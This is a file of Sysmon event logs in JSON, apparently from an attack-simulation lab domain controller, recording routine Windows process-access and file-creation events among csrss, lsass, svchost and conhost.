{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00105E400100}\r\nTargetProcessId: 2184\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00105E400100}","TargetProcessId":"2184","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00105F400100}\r\nTargetProcessId: 2192\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00105F400100}","TargetProcessId":"2192","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.506\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.506","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.522\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1972\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.522","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1972","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.584\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\wbem\\Repository\\WRITABLE.TST\r\nCreationUtcTime: 2020-08-01 06:48:59.584","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.584","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\wbem\\Repository\\WRITABLE.TST","CreationUtcTime":"2020-08-01 06:48:59.584","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
